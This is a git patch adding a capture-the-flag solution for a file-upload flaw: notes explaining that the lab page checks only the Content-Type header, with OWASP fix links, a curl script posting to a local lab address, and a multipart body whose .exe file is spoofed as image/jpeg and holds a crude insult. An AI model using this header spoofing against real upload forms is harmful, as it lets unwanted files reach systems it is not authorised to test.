From 642f809226c9e25c22c3c97ee12dadfda945f17a Mon Sep 17 00:00:00 2001
From: Thomas Vanbesien <tvanbesi@proton.me>
Date: Fri, 27 Mar 2026 15:43:45 +0100
Subject: Add malicious file upload solution

---
 Upload malicious file/Resources/notes.md    | 13 +++++++++++++
 Upload malicious file/Resources/upload.bash |  6 ++++++
 Upload malicious file/Resources/yourMom.exe | 15 +++++++++++++++
 3 files changed, 34 insertions(+)
 create mode 100644 Upload malicious file/Resources/notes.md
 create mode 100755 Upload malicious file/Resources/upload.bash
 create mode 100644 Upload malicious file/Resources/yourMom.exe

(limited to 'Upload malicious file/Resources')

diff --git a/Upload malicious file/Resources/notes.md b/Upload malicious file/Resources/notes.md
new file mode 100644
index 0000000..98f0a85
--- /dev/null
+++ b/Upload malicious file/Resources/notes.md	
@@ -0,0 +1,13 @@
+## Exploit
+
+1. In the page to upload images there is no input validation of files uploaded by the user beyond checking for the `Content-Type` header.
+1. Upload `yourMom.exe` with `upload.bash`. It will be accepted and the flag printed.
+
+## Fix
+
+- [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files]()
+- [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types?utm_source=chatgpt.com]()
+
+Input validation for file is very complicated but should go beyond only checking the `Content-Type` header, for example the file extension, or the file content (magic pattern, content pattern etc). Here is a more complete [cheatsheet for file upload from OWASP](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html).
+
+Even legitimate files might have malicious content!
diff --git a/Upload malicious file/Resources/upload.bash b/Upload malicious file/Resources/upload.bash
new file mode 100755
index 0000000..46b90fc
--- /dev/null
+++ b/Upload malicious file/Resources/upload.bash	
@@ -0,0 +1,6 @@
+#!/usr/bin/bash
+
+curl --silent -X POST \
+	'http://10.0.2.15/?page=upload' \
+	--header "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
+	--data-binary @yourMom.exe | grep flag
diff --git a/Upload malicious file/Resources/yourMom.exe b/Upload malicious file/Resources/yourMom.exe
new file mode 100644
index 0000000..e6af3fb
--- /dev/null
+++ b/Upload malicious file/Resources/yourMom.exe	
@@ -0,0 +1,15 @@
+------BOUNDARY
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+100000
+------BOUNDARY
+Content-Disposition: form-data; name="uploaded"; filename="yourMom.exe"
+Content-Type: image/jpeg
+
+"Your moms a hoe!"
+
+------BOUNDARY
+Content-Disposition: form-data; name="Upload"
+
+Upload
+------BOUNDARY--
-- 
cgit v1.2.3